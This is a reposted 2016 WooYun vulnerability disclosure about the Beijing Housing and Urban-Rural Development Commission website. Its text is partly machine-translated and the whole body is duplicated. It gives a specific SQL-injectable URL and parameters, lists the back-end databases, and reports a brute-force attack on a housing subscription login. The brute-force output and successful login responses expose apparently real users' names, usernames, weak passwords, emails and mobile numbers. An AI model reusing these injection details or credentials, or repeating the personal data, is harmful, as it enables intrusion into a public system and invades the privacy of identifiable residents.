北京市住建委漏洞打包(主站两处注入\可爆破获取用户信息)
漏洞标题 北京市住建委漏洞打包(主站两处注入\可爆破获取用户信息) 相关厂商 北京市住房和城乡建设委员会 漏洞作者 路人甲 提交时间 2016-04-22 22:40 公开时间 2016-06-10 …
漏洞标题
北京市住房和建设委员会脆弱性一揽子计划(主站两次注射\爆破获取用户信息)
相关制造商
北京市住房和城乡建设委员会
漏洞作者
过路人
提交时间
2016-04-22 22: 40
公共时间
2016-06-10 19: 00
漏洞类型
应用配置错误
危险等级
高
自我评估等级
10
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
密码强度低
漏洞详细信息
http://**。**。**。**/tabid/2159/Default.aspx?ModelKey=SendInfo& Contract_qyh=Y1741851& Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC& Contract_Password=666666
Contract_qyh和Contract_Password
注射存在两个参数
前一个是Contract_mf注入点。由于没有进一步测试,最后一个被发送。经过测试,其他两个也有注射。
可用数据库[20]:
[*]申请
[*] bjfdc
[*] bjfdc_for_auditburea
[*] bjfdc_tax
[*] bjhouse
[*] bjhouse_application
[*] bjrema
[*] 数据中心
[*]图
[*] jianceshi
[*]主人
[*]模型
[*] msdb
政策公寓
[*] real_estate_analyse
[*] real_estate_analyse_bak
[*] real_estate_analyseImportdata
[*] tempdb
[*] ttib
[*] vk
漏洞证明:
http://**。**。**。**/enroll/home.jsp
自住商品房在线订阅系统,验证码无用,大量用户弱密码,只测试top500用户名,密码被采用
123456,111111,000000,用户名等
413lironglirong200falsefalse546
352zhangjingzhangjing200falsefalse547
159wangningwangning200falsefalse549
329wanglongwanglong200falsefalse551
379liuyuyingliuyuying200falsefalse551
478zhangkunzhangkun200falsefalse551
76wangyulanwangyulan200falsefalse553
400zhanglijuanzhanglijuan200falsefalse553
404liguixiangliguixiang200falsefalse554
270wangshuzhenwangshuzhen200falsefalse557
173zhangfengyingzhangfengying200falsefalse559
1041lixia123456200falsefalse543
1312lixiumei123456200falsefalse552
686chenfang111111200falsefalse553
1943wangjinfeng000000200falsefalse556
1075zhangguiying123456200falsefalse560
{'flag': 1,'message':'登录成功! ','data': {'id':'54016','people_name':'Li Rong','username':'lirong','email':'287084850@**.**.**.** ','mobile':'15510318399'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'12033','people_name':'Zhang Jing','username':'zhangjing','email':'6032561@**.**.**.** ','mobile':'13801623808'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'46693','people_name':'Wang Ning','username':'wangning','email':'casio0018@**.**.**.** ','mobile':'13521143322'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'30169','people_name':'Wing Long','username':'wanglong','email':'wl_post@**.**.**.** ','mobile':'13810447522'},'redirectUrl': null}
修理计划:
注入问题content_可能在其他地方,检查出来
第二个系统处理验证码并提醒用户更改密码。
版权声明:请注明出处。居民A @乌云
可用数据库[20]:
[*]申请
[*] bjfdc
[*] bjfdc_for_auditburea
[*] bjfdc_tax
[*] bjhouse
[*] bjhouse_application
[*] bjrema
[*] 数据中心
[*]图
[*] jianceshi
[*]主人
[*]模型
[*] msdb
政策公寓
[*] real_estate_analyse
[*] real_estate_analyse_bak
[*] real_estate_analyseImportdata
[*] tempdb
[*] ttib
[*] vk
漏洞证明:
http://**。**。**。**/enroll/home.jsp
自住商品房在线订阅系统,验证码无用,大量用户弱密码,只测试top500用户名,密码被采用
123456,111111,000000,用户名等
413lironglirong200falsefalse546
352zhangjingzhangjing200falsefalse547
159wangningwangning200falsefalse549
329wanglongwanglong200falsefalse551
379liuyuyingliuyuying200falsefalse551
478zhangkunzhangkun200falsefalse551
76wangyulanwangyulan200falsefalse553
400zhanglijuanzhanglijuan200falsefalse553
404liguixiangliguixiang200falsefalse554
270wangshuzhenwangshuzhen200falsefalse557
173zhangfengyingzhangfengying200falsefalse559
1041lixia123456200falsefalse543
1312lixiumei123456200falsefalse552
686chenfang111111200falsefalse553
1943wangjinfeng000000200falsefalse556
1075zhangguiying123456200falsefalse560
{'flag': 1,'message':'登录成功! ','data': {'id':'54016','people_name':'Li Rong','username':'lirong','email':'287084850@**.**.**.** ','mobile':'15510318399'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'12033','people_name':'Zhang Jing','username':'zhangjing','email':'6032561@**.**.**.** ','mobile':'13801623808'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'46693','people_name':'Wang Ning','username':'wangning','email':'casio0018@**.**.**.** ','mobile':'13521143322'},'redirectUrl': null}
{'flag': 1,'message':'登录成功! ','data': {'id':'30169','people_name':'Wing Long','username':'wanglong','email':'wl_post@**.**.**.** ','mobile':'13810447522'},'redirectUrl': null}
修理计划:
注入问题content_可能在其他地方,检查出来
第二个系统处理验证码并提醒用户更改密码。
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 530 )
- 分类:黑客技术
